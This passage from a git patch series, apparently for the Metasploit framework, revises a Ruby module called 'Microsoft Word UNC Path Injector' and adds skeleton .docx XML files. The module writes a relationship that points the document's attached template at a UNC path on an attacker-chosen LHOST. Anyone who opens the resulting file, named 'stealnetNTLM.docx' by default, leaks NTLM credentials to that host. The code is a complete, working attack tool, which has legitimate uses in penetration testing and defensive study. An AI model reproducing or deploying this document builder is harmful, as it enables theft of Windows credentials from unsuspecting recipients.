w:val="00B25E88"/><w:rPr><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:style><w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont"><w:name w:val="Default Paragraph Font"/><w:uiPriority w:val="99"/><w:semiHidden/></w:style><w:style w:type="table" w:default="1" w:styleId="TableNormal"><w:name w:val="Normal Table"/><w:uiPriority w:val="99"/><w:semiHidden/><w:unhideWhenUsed/><w:qFormat/><w:tblPr><w:tblInd w:w="0" w:type="dxa"/><w:tblCellMar><w:top w:w="0" w:type="dxa"/><w:left w:w="108" w:type="dxa"/><w:bottom w:w="0" w:type="dxa"/><w:right w:w="108" w:type="dxa"/></w:tblCellMar></w:tblPr></w:style><w:style w:type="numbering" w:default="1" w:styleId="NoList"><w:name w:val="No List"/><w:uiPriority w:val="99"/><w:semiHidden/><w:unhideWhenUsed/></w:style></w:styles> \ No newline at end of file diff --git a/data/exploits/docx/word/theme/theme1.xml b/data/exploits/docx/word/theme/theme1.xml new file mode 100644 index 000000000000..a06c80529b6c --- /dev/null +++ b/data/exploits/docx/word/theme/theme1.xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme"><a:themeElements><a:clrScheme name="Office"><a:dk1><a:sysClr val="windowText" lastClr="000000"/></a:dk1><a:lt1><a:sysClr val="window" lastClr="FFFFFF"/></a:lt1><a:dk2><a:srgbClr val="1F497D"/></a:dk2><a:lt2><a:srgbClr val="EEECE1"/></a:lt2><a:accent1><a:srgbClr val="4F81BD"/></a:accent1><a:accent2><a:srgbClr val="C0504D"/></a:accent2><a:accent3><a:srgbClr val="9BBB59"/></a:accent3><a:accent4><a:srgbClr val="8064A2"/></a:accent4><a:accent5><a:srgbClr val="4BACC6"/></a:accent5><a:accent6><a:srgbClr val="F79646"/></a:accent6><a:hlink><a:srgbClr val="0000FF"/></a:hlink><a:folHlink><a:srgbClr val="800080"/></a:folHlink></a:clrScheme><a:fontScheme name="Office"><a:majorFont><a:latin typeface="Cambria"/><a:ea typeface=""/><a:cs typeface=""/><a:font script="Jpan" typeface="MS ゴシック"/><a:font script="Hang" typeface="맑은 고딕"/><a:font script="Hans" typeface="宋体"/><a:font script="Hant" typeface="新細明體"/><a:font script="Arab" typeface="Times New Roman"/><a:font script="Hebr" typeface="Times New Roman"/><a:font script="Thai" typeface="Angsana New"/><a:font script="Ethi" typeface="Nyala"/><a:font script="Beng" typeface="Vrinda"/><a:font script="Gujr" typeface="Shruti"/><a:font script="Khmr" typeface="MoolBoran"/><a:font script="Knda" typeface="Tunga"/><a:font script="Guru" typeface="Raavi"/><a:font script="Cans" typeface="Euphemia"/><a:font script="Cher" typeface="Plantagenet Cherokee"/><a:font script="Yiii" typeface="Microsoft Yi Baiti"/><a:font script="Tibt" typeface="Microsoft Himalaya"/><a:font script="Thaa" typeface="MV Boli"/><a:font script="Deva" typeface="Mangal"/><a:font script="Telu" typeface="Gautami"/><a:font script="Taml" typeface="Latha"/><a:font script="Syrc" typeface="Estrangelo Edessa"/><a:font script="Orya" typeface="Kalinga"/><a:font script="Mlym" typeface="Kartika"/><a:font script="Laoo" typeface="DokChampa"/><a:font script="Sinh" typeface="Iskoola Pota"/><a:font script="Mong" typeface="Mongolian Baiti"/><a:font script="Viet" typeface="Times New Roman"/><a:font script="Uigh" typeface="Microsoft Uighur"/></a:majorFont><a:minorFont><a:latin typeface="Calibri"/><a:ea typeface=""/><a:cs typeface=""/><a:font script="Jpan" typeface="MS 明朝"/><a:font script="Hang" typeface="맑은 고딕"/><a:font script="Hans" typeface="宋体"/><a:font script="Hant" typeface="新細明體"/><a:font script="Arab" typeface="Arial"/><a:font script="Hebr" typeface="Arial"/><a:font script="Thai" typeface="Cordia New"/><a:font script="Ethi" typeface="Nyala"/><a:font script="Beng" typeface="Vrinda"/><a:font script="Gujr" typeface="Shruti"/><a:font script="Khmr" typeface="DaunPenh"/><a:font script="Knda" typeface="Tunga"/><a:font script="Guru" typeface="Raavi"/><a:font script="Cans" typeface="Euphemia"/><a:font script="Cher" typeface="Plantagenet Cherokee"/><a:font script="Yiii" typeface="Microsoft Yi Baiti"/><a:font script="Tibt" typeface="Microsoft Himalaya"/><a:font script="Thaa" typeface="MV Boli"/><a:font script="Deva" typeface="Mangal"/><a:font script="Telu" typeface="Gautami"/><a:font script="Taml" typeface="Latha"/><a:font script="Syrc" typeface="Estrangelo Edessa"/><a:font script="Orya" typeface="Kalinga"/><a:font script="Mlym" typeface="Kartika"/><a:font script="Laoo" typeface="DokChampa"/><a:font script="Sinh" typeface="Iskoola Pota"/><a:font script="Mong" typeface="Mongolian Baiti"/><a:font script="Viet" typeface="Arial"/><a:font script="Uigh" typeface="Microsoft Uighur"/></a:minorFont></a:fontScheme><a:fmtScheme name="Office"><a:fillStyleLst><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="50000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="35000"><a:schemeClr val="phClr"><a:tint val="37000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:tint val="15000"/><a:satMod val="350000"/></a:schemeClr></a:gs></a:gsLst><a:lin ang="16200000" scaled="1"/></a:gradFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:shade val="51000"/><a:satMod val="130000"/></a:schemeClr></a:gs><a:gs pos="80000"><a:schemeClr val="phClr"><a:shade val="93000"/><a:satMod val="130000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="94000"/><a:satMod val="135000"/></a:schemeClr></a:gs></a:gsLst><a:lin ang="16200000" scaled="0"/></a:gradFill></a:fillStyleLst><a:lnStyleLst><a:ln w="9525" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"><a:shade val="95000"/><a:satMod val="105000"/></a:schemeClr></a:solidFill><a:prstDash val="solid"/></a:ln><a:ln w="25400" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:prstDash val="solid"/></a:ln><a:ln w="38100" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:prstDash val="solid"/></a:ln></a:lnStyleLst><a:effectStyleLst><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="38000"/></a:srgbClr></a:outerShdw></a:effectLst></a:effectStyle><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="35000"/></a:srgbClr></a:outerShdw></a:effectLst></a:effectStyle><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="35000"/></a:srgbClr></a:outerShdw></a:effectLst><a:scene3d><a:camera prst="orthographicFront"><a:rot lat="0" lon="0" rev="0"/></a:camera><a:lightRig rig="threePt" dir="t"><a:rot lat="0" lon="0" rev="1200000"/></a:lightRig></a:scene3d><a:sp3d><a:bevelT w="63500" h="25400"/></a:sp3d></a:effectStyle></a:effectStyleLst><a:bgFillStyleLst><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="40000"/><a:satMod val="350000"/></a:schemeClr></a:gs><a:gs pos="40000"><a:schemeClr val="phClr"><a:tint val="45000"/><a:shade val="99000"/><a:satMod val="350000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="20000"/><a:satMod val="255000"/></a:schemeClr></a:gs></a:gsLst><a:path path="circle"><a:fillToRect l="50000" t="-80000" r="50000" b="180000"/></a:path></a:gradFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="80000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="30000"/><a:satMod val="200000"/></a:schemeClr></a:gs></a:gsLst><a:path path="circle"><a:fillToRect l="50000" t="50000" r="50000" b="50000"/></a:path></a:gradFill></a:bgFillStyleLst></a:fmtScheme></a:themeElements><a:objectDefaults/><a:extraClrSchemeLst/></a:theme> \ No newline at end of file diff --git a/data/exploits/docx/word/webSettings.xml b/data/exploits/docx/word/webSettings.xml new file mode 100644 index 000000000000..b4a16977f713 --- /dev/null +++ b/data/exploits/docx/word/webSettings.xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:optimizeForBrowser/></w:webSettings> \ No newline at end of file diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index 95410ef7cf4d..147b3dfd0bc1 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb @@ -6,10 +6,13 @@ ## require 'msf/core' -require 'zip/zip' +require 'zip/zip' #for extracting files +require 'rex/zip' #for creating files class Metasploit3 < Msf::Auxiliary + include Msf::Exploit::FILEFORMAT + def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Word UNC Path Injector', @@ -22,7 +25,6 @@ def initialize(info = {}) 2007 and 2010 as of Januari 2013 date by using auxiliary/server/capture/smb }, 'License' => MSF_LICENSE, - 'Version' => '$Revision: 1 $', 'References' => [ [ 'URL', 'http://jedicorp.com/?p=534' ], @@ -35,114 +37,123 @@ def initialize(info = {}) register_options( [ - OptAddress.new('LHOST',[true, 'Server IP or hostname that the .docx document points to','']), - OptString.new('SRCFILE', [false, '.docx file to backdoor. If left empty, creates an emtpy document', '']), - OptString.new('SKLFILENAME', [false,'Document output filename', 'stealnetNTLM.docx']), - OptPath.new('SKLOUTPUTPATH', [false, 'The location where the backdoored empty .docx file will be written','./']), - OptString.new('SKLDOCAUTHOR',[false,'Document author for skeleton document', 'SphaZ']), + OptAddress.new('LHOST',[true, 'Server IP or hostname that the .docx document points to.','']), + OptString.new('SOURCE', [false, 'Full path and filename of .docx file to use as source. If empty, creates new document', '']), + OptString.new('FILENAME', [true, 'Document output filename.', 'stealnetNTLM.docx']), + OptString.new('DOCAUTHOR',[false,'Document author for empty document.', 'SphaZ']), ], self.class) end - - #here we create an empty .docx file with the UNC path. Only done when SRCFILE is empty + #here we create an empty .docx file with the UNC path. Only done when FILENAME is empty def makeNewFile metadataFileData = "" metadataFileData << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><cp:coreProperties" metadataFileData << " xmlns:cp=\"http://schemas.openxmlformats.org/package/2006/metadata/core-properties\" " metadataFileData << "xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" " metadataFileData << "xmlns:dcmitype=\"http://purl.org/dc/dcmitype/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">" - metadataFileData << "<dc:creator>#{datastore['SKLDOCAUTHOR']}</dc:creator><cp:lastModifiedBy>#{datastore['SKLDOCAUTHOR']}" + metadataFileData << "<dc:creator>#{datastore['DOCAUTHOR']}</dc:creator><cp:lastModifiedBy>#{datastore['DOCAUTHOR']}" metadataFileData << "</cp:lastModifiedBy><cp:revision>1</cp:revision><dcterms:created xsi:type=\"dcterms:W3CDTF\">" metadataFileData << "2013-01-08T14:14:00Z</dcterms:created><dcterms:modified xsi:type=\"dcterms:W3CDTF\">" metadataFileData << "2013-01-08T14:14:00Z</dcterms:modified></cp:coreProperties>" - #Lets get the local filepath to figure out where we need to write the metadata file - metadataFileName = File.dirname(self.file_path)+'/sourcedoc/docProps/core.xml' + #where to find the skeleton files required for creating an empty document + dataDir = File.join(Msf::Config.install_root, "data", "exploits", "docx") + tmpDir = "#{Dir.tmpdir}/unc_tmp" + + #setup temporary directory structure begin - if File.exists?(metadataFileName) - vprint_status("Deleting metadatafile") - File.delete(metadataFileName) - end - fd = File.open( metadataFileName, 'wb+' ) - fd.puts(metadataFileData) - fd.close + cleanupTmp(tmpDir) + FileUtils.mkdir_p("#{tmpDir}/docProps/") + FileUtils.mkdir_p("#{tmpDir}/word/_rels/") rescue - print_error("Cant write to #{metadataFileName} make sure module and data are intact") + print_error("Error generating temp directory structure.") return nil - end + end - #now lets write the _rels file that contains the UNC path - refdataFileName = File.dirname(self.file_path) + '/sourcedoc/word/_rels/settings.xml.rels' + #here we store our on-the-fly created files begin - fd = File.open( refdataFileName, 'wb+' ) - fd.puts(@relsFileData) - fd.close + f = File.open("#{tmpDir}/docProps/core.xml", 'wb') + f.write(metadataFileData) + f.close() + f = File.open("#{tmpDir}/word/_rels/settings.xml.rels", 'wb') + f.write(@relsFileData) + f.close() rescue - print_error("Cant write to #{refdataFileName} make sure module and data are intact.") - return nil - end - - #and finally, lets creat the .docx file - inputPath = File.dirname(self.file_path) + '/sourcedoc/' - inputPath.sub!(%r[/S],'') - - archive = File.join(datastore['SKLOUTPUTPATH'], datastore['SKLFILENAME']) - #if file exists, lets not overwrite - if File.exists?(archive) - print_error("Output file #{archive} already exists! Set a different name for SKLOUTPUTPATH and/or SKLFILENAME.") + print_error("Cant write to temp file.") + cleanupTmp(tmpDir) return nil end - if zipDocx(inputPath, archive, false).nil? + #making the actual docx + begin + docx = Rex::Zip::Archive.new + #add skeleton files + vprint_status("Adding skeleton files from #{dataDir}") + Dir["#{dataDir}/**/**"].each do |file| + if not File.directory?(file) + docx.add_file(file.sub(dataDir,''), File.read(file)) + end + end + #add on-the-fly created documents + vprint_status("Adding injected files") + Dir["#{Dir.tmpdir}/unc_tmp/**/**"].each do |file| + if not File.directory?(file) + docx.add_file(file.sub("#{Dir.tmpdir}/unc_tmp/",''), File.read(file)) + end + end + #add the otherwise skipped "hidden" file + file = "#{dataDir}/_rels/.rels" + docx.add_file(file.sub(dataDir,''), File.read(file)) + file_create(docx.pack) + rescue + print_error("Error creating empty document #{datastore['FILENAME']}") + cleanupTmp(tmpDir) return nil end - + + cleanupTmp(tmpDir) + return 0 + end + + #cleaning up of temporary files. If it fails we say so, but continue anyway + def cleanupTmp(dir) begin - #delete the created xml files, the less evidence of parameters used the better - File.delete(File.dirname(self.file_path)+'/sourcedoc/docProps/core.xml') - File.delete(File.dirname(self.file_path) + '/sourcedoc/word/_rels/settings.xml.rels') + FileUtils.rm_rf(dir) rescue - print_error("Error deleting local core and settings documents. Generating new file worked though") + print_error("Error cleaning up tmp directory structure.") end - return 0 end - #this bit checks the settings.xml and looks for the relations file entry we need for our evil masterplan. - #and then inserts the UNC path into the _rels file. + #here we inject an UNC path into an existing file, and store the injected file in FILENAME def manipulateFile + #where do we unpack our source file? + tmpDir = "#{Dir.tmpdir}/#{Time.now.to_i}#{rand(1000)}/" ref = "<w:attachedTemplate r:id=\"rId1\"/>" - if File.exists?(datastore['SRCFILE']) - if File.stat(datastore['SRCFILE']).readable? and File.stat(datastore['SRCFILE']).writable? - vprint_status("We can read and write the file, this is probably a good thing :P") - else - print_error("Not enough rights to modify the file. Aborting.") + if File.exists?(datastore['SOURCE']) + if not File.stat(datastore['SOURCE']).readable? + print_error("Not enough rights to read the file. Aborting.") return nil end - fileContent = getFileFromDocx("word/settings.xml") - if fileContent.nil? + #lets extract our docx + if unzipDocx(tmpDir).nil? return nil - end + end + fileContent = File.read("#{tmpDir}/word/settings.xml") + if not fileContent.index("w:attachedTemplate r:id=\"rId1\"").nil? vprint_status("Reference to rels file already exists in settings file, we dont need to add it :)") - #and we put just our rels file into the docx - if unzipDocx.nil? - return nil - end - if updateDocxFile("word/_rels/settings.xml.rels", @relsFileData).nil? + + #we put just our rels file into the docx + if updateDocxFile(tmpDir,"word/_rels/settings.xml.rels", @relsFileData).nil? return nil end - #ok we got through this, lets zip the file, overwriting the original in this case - begin - File.delete(datastore['SRCFILE']) - if zipDocx(@tmpDir, datastore['SRCFILE'],true).nil? - return nil - end - rescue - print_error("Can't modify the original document :(") + + # lets zip the end result + if zipDocx(tmpDir).nil? return nil end else @@ -154,166 +165,128 @@ def manipulateFile if not insertTwo.nil? vprint_status("HypenationZone found, we use this for insertion.") fileContent.insert(insertTwo, ref ) - end + end else vprint_status("DefaultTabStop found, we use this for insertion.") fileContent.insert(insertOne, ref ) - end + end if insertOne.nil? && insertTwo.nil? - vprint_error("Cannot find insert point for reference into settings.xml") + print_error("Cannot find insert point for reference into settings.xml") + cleanupTmp(tmpDir) return nil end - if unzipDocx.nil? + #lets extract our docx + if unzipDocx(tmpDir).nil? return nil end - #update the settings files - if updateDocxFile("word/settings.xml",fileContent).nil? + + #update the files that contain the injection and reference + if updateDocxFile(tmpDir, "word/settings.xml",fileContent).nil? print_error("Error inserting data into word/settings.xml") return nil end - if updateDocxFile("word/_rels/settings.xml.rels", @relsFileData).nil? + if updateDocxFile(tmpDir, "word/_rels/settings.xml.rels", @relsFileData).nil? print_error("Eror inserting data into word/_rels/settings.xml.rels") return nil end - #ok we got through this, lets zip the file, overwriting the original in this case - begin - File.delete(datastore['SRCFILE']) - if zipDocx(@tmpDir, datastore['SRCFILE'],true).nil? - return nil - end - rescue - print_error("Can't modify the original document :(") + + #lets zip the file + if zipDocx(tmpDir).nil? return nil end end else - print_error("File #{datastore['SRCFILE']} does not exist. Aborting.") + print_error("File #{datastore['SOURCE']} does not exist.") return nil end + cleanupTmp(tmpDir) return 0 end - #read a file from .docx into a string - def getFileFromDocx(fileString) + #making the actual docx + def zipDocx(tmpDir) begin - Zip::ZipFile.open(datastore['SRCFILE']) do |fileZip| - fileZip.each do |f| - next unless f.to_s == fileString - return f.get_input_stream.read + docx = Rex::Zip::Archive.new + #add skeleton files + vprint_status("Adding files from #{tmpDir}") + Dir["#{tmpDir}/**/**"].each do |file| + if not File.directory?(file) + docx.add_file(file.sub(tmpDir,''), File.read(file)) end end - fileZip.close - print_error("Cant find #{fileString} inside the .docx") - return nil + #add the otherwise skipped "hidden" file + file = "#{tmpDir}/_rels/.rels" + docx.add_file(file.sub(tmpDir,''), File.read(file)) + file_create(docx.pack) rescue - print_error("Unknown error reading docx file.") - fileZip.close + print_error("Error creating compressed document #{datastore['FILENAME']}") + cleanupTmp(tmpDir) return nil end - fileZip.close end - def zipDocx(inputPath, archive, delsource) + #unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way + def unzipDocx(tmpDir) begin - #add the prepared files to the zip file - Zip::ZipFile.open(archive, 'wb') do |fileZip| - Dir["#{inputPath}/**/**"].reject{|f|f==archive}.each do |file| - fileZip.add(file.sub(inputPath+'/',''), file) - end - relsFile = inputPath + '/_rels/.rels' - fileZip.add(relsFile.sub(inputPath+'/',''), relsFile) - end - rescue - print_error("Error zipping file..") - begin - FileUtils.rm_rf(inputPath) - rescue - print_error("Cant even clean up my own mess, I give up") - return nil - end - return nil - end - #do we delete the source? - if delsource - begin - FileUtils.rm_rf(inputPath) - rescue - print_error("Cant even clean up my own mess, I give up") - end - end - return 0 - end - - def unzipDocx - begin - vprint_status("tmpdir: #{@tmpDir}") - if not File.directory?(@tmpDir) - vprint_status("Damn rubyzip cant be relied upon, so we do it the hard way. Extracting #{datastore['SRCFILE']}") - Zip::ZipFile.open(datastore['SRCFILE']) do |fileZip| + if not File.directory?(tmpDir) + vprint_status("Damn rubyzip cant be relied upon, so we do it the hard way. Extracting #{datastore['SOURCE']}") + Zip::ZipFile.open(datastore['SOURCE']) do |fileZip| fileZip.each do |entry| - if not entry.nil? - vprint_status("extracting entry: #{entry.name}") - end - fpath = File.join(@tmpDir, entry.name) + fpath = File.join(tmpDir, entry.name) FileUtils.mkdir_p(File.dirname(fpath)) fileZip.extract(entry, fpath) end end end rescue - print_error("There was an error unzipping") + print_error("There was an error unzipping.") + cleanupTmp(tmpDir) return nil end return 0 end #used for updating the files inside the docx from a string - def updateDocxFile(fileString, content) + def updateDocxFile(tmpDir,fileString, content) begin - #ok so now we unpacked the docx file, lets start to update the file we need to do - #does the file already exist? - archive = File.join(@tmpDir, fileString) + archive = File.join(tmpDir, fileString) vprint_status("We need to look for: #{archive}") if File.exists?(archive) vprint_status("Deleting original file #{archive}") File.delete(archive) end - #now lets put OUR file there File.open(archive, 'wb+') { |f| f.write(content) } rescue Exception => ex print_error("Well, extracting and manipulating the file went wrong :(") + cleanupTmp(tmpDir) return nil end return 0 end def run - #we need this in in bot makeNewFile and manipulateFile + #we need this in makeNewFile and manipulateFile @relsFileData = "" @relsFileData << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>".chomp @relsFileData << "<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\">".chomp @relsFileData << "<Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/".chomp @relsFileData << "attachedTemplate\" Target=\"file://\\\\#{datastore['LHOST']}\\normal.dot\" TargetMode=\"External\"/></Relationships>" - #where do we unpack our file? - @tmpDir = "#{Dir.tmpdir}/#{Time.now.to_i}#{rand(1000)}/" - if "#{datastore['SRCFILE']}" == "" + if "#{datastore['SOURCE']}" == "" #make an empty file print_status("Creating empty document") if not makeNewFile.nil? - print_good("Success! Document #{datastore['SKLFILENAME']} created in #{datastore['SKLOUTPUTPATH']}") + print_good("Success! Empty document #{datastore['FILENAME']} created.") end else #extract the word/settings.xml and edit in the reference we need print_status("Injecting UNC path into existing document.") if not manipulateFile.nil? - print_good("Success! Document #{datastore['SRCFILE']} now references to #{datastore['LHOST']}") - else - print_error("Something went wrong!") + print_good("Copy of #{datastore['SOURCE']} called #{datastore['FILENAME']} points to #{datastore['LHOST']}.") end end end From 145cf618aa8b4ab32c1c679d669ebf0b3055f628 Mon Sep 17 00:00:00 2001 From: SphaZ <cyberphaz@gmail.com> Date: Mon, 4 Feb 2013 13:51:01 +0100 Subject: [PATCH 260/421] msftidy --- modules/auxiliary/docx/word_unc_injector.rb | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index 147b3dfd0bc1..ccf94a838f6e 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb @@ -56,7 +56,7 @@ def makeNewFile metadataFileData << "2013-01-08T14:14:00Z</dcterms:created><dcterms:modified xsi:type=\"dcterms:W3CDTF\">" metadataFileData << "2013-01-08T14:14:00Z</dcterms:modified></cp:coreProperties>" - #where to find the skeleton files required for creating an empty document + #where to find the skeleton files required for creating an empty document dataDir = File.join(Msf::Config.install_root, "data", "exploits", "docx") tmpDir = "#{Dir.tmpdir}/unc_tmp" @@ -68,7 +68,7 @@ def makeNewFile rescue print_error("Error generating temp directory structure.") return nil - end + end #here we store our on-the-fly created files begin @@ -91,14 +91,14 @@ def makeNewFile vprint_status("Adding skeleton files from #{dataDir}") Dir["#{dataDir}/**/**"].each do |file| if not File.directory?(file) - docx.add_file(file.sub(dataDir,''), File.read(file)) + docx.add_file(file.sub(dataDir,''), File.read(file)) end end #add on-the-fly created documents vprint_status("Adding injected files") Dir["#{Dir.tmpdir}/unc_tmp/**/**"].each do |file| if not File.directory?(file) - docx.add_file(file.sub("#{Dir.tmpdir}/unc_tmp/",''), File.read(file)) + docx.add_file(file.sub("#{Dir.tmpdir}/unc_tmp/",''), File.read(file)) end end #add the otherwise skipped "hidden" file @@ -110,11 +110,11 @@ def makeNewFile cleanupTmp(tmpDir) return nil end - + cleanupTmp(tmpDir) return 0 end - + #cleaning up of temporary files. If it fails we say so, but continue anyway def cleanupTmp(dir) begin @@ -140,10 +140,10 @@ def manipulateFile #lets extract our docx if unzipDocx(tmpDir).nil? return nil - end + end fileContent = File.read("#{tmpDir}/word/settings.xml") - + if not fileContent.index("w:attachedTemplate r:id=\"rId1\"").nil? vprint_status("Reference to rels file already exists in settings file, we dont need to add it :)") @@ -215,7 +215,7 @@ def zipDocx(tmpDir) vprint_status("Adding files from #{tmpDir}") Dir["#{tmpDir}/**/**"].each do |file| if not File.directory?(file) - docx.add_file(file.sub(tmpDir,''), File.read(file)) + docx.add_file(file.sub(tmpDir,''), File.read(file)) end end #add the otherwise skipped "hidden" file From 3b528d7f6d13d530b7f66d8d8839ba33900af9fe Mon Sep 17 00:00:00 2001 From: SphaZ <cyberphaz@gmail.com> Date: Mon, 4 Feb 2013 14:00:13 +0100 Subject: [PATCH 261/421] removed data files from docx --- modules/auxiliary/docx/sourcedoc/[Content_Types].xml | 2 -- modules/auxiliary/docx/sourcedoc/_rels/.rels | 2 -- modules/auxiliary/docx/sourcedoc/docProps/app.xml | 2 -- modules/auxiliary/docx/sourcedoc/word/_rels/document.xml.rels | 2 -- modules/auxiliary/docx/sourcedoc/word/document.xml | 2 -- modules/auxiliary/docx/sourcedoc/word/fontTable.xml | 2 -- modules/auxiliary/docx/sourcedoc/word/settings.xml | 2 -- modules/auxiliary/docx/sourcedoc/word/styles.xml | 2 -- modules/auxiliary/docx/sourcedoc/word/theme/theme1.xml | 2 -- modules/auxiliary/docx/sourcedoc/word/webSettings.xml | 2 -- 10 files changed, 20 deletions(-) delete mode 100644 modules/auxiliary/docx/sourcedoc/[Content_Types].xml delete mode 100644 modules/auxiliary/docx/sourcedoc/_rels/.rels delete mode 100644 modules/auxiliary/docx/sourcedoc/docProps/app.xml delete mode 100644 modules/auxiliary/docx/sourcedoc/word/_rels/document.xml.rels delete mode 100644 modules/auxiliary/docx/sourcedoc/word/document.xml delete mode 100644 modules/auxiliary/docx/sourcedoc/word/fontTable.xml delete mode 100644 modules/auxiliary/docx/sourcedoc/word/settings.xml delete mode 100644 modules/auxiliary/docx/sourcedoc/word/styles.xml delete mode 100644 modules/auxiliary/docx/sourcedoc/word/theme/theme1.xml delete mode 100644 modules/auxiliary/docx/sourcedoc/word/webSettings.xml diff --git a/modules/auxiliary/docx/sourcedoc/[Content_Types].xml b/modules/auxiliary/docx/sourcedoc/[Content_Types].xml deleted file mode 100644 index 39a9cb897f0e..000000000000 --- a/modules/auxiliary/docx/sourcedoc/[Content_Types].xml +++ /dev/null @@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/></Types> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/_rels/.rels b/modules/auxiliary/docx/sourcedoc/_rels/.rels deleted file mode 100644 index fdd8c4f37126..000000000000 --- a/modules/auxiliary/docx/sourcedoc/_rels/.rels +++ /dev/null @@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/docProps/app.xml b/modules/auxiliary/docx/sourcedoc/docProps/app.xml deleted file mode 100644 index 1f971257721b..000000000000 --- a/modules/auxiliary/docx/sourcedoc/docProps/app.xml +++ /dev/null @@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>hoi.dot</Template><TotalTime>0</TotalTime><Pages>1</Pages><Words>0</Words><Characters>3</Characters><Application>Microsoft Office Outlook</Application><DocSecurity>0</DocSecurity><Lines>0</Lines><Paragraphs>0</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>0</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>12.0000</AppVersion></Properties> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/_rels/document.xml.rels b/modules/auxiliary/docx/sourcedoc/word/_rels/document.xml.rels deleted file mode 100644 index 0079d06931a7..000000000000 --- a/modules/auxiliary/docx/sourcedoc/word/_rels/document.xml.rels +++ /dev/null @@ -1,2 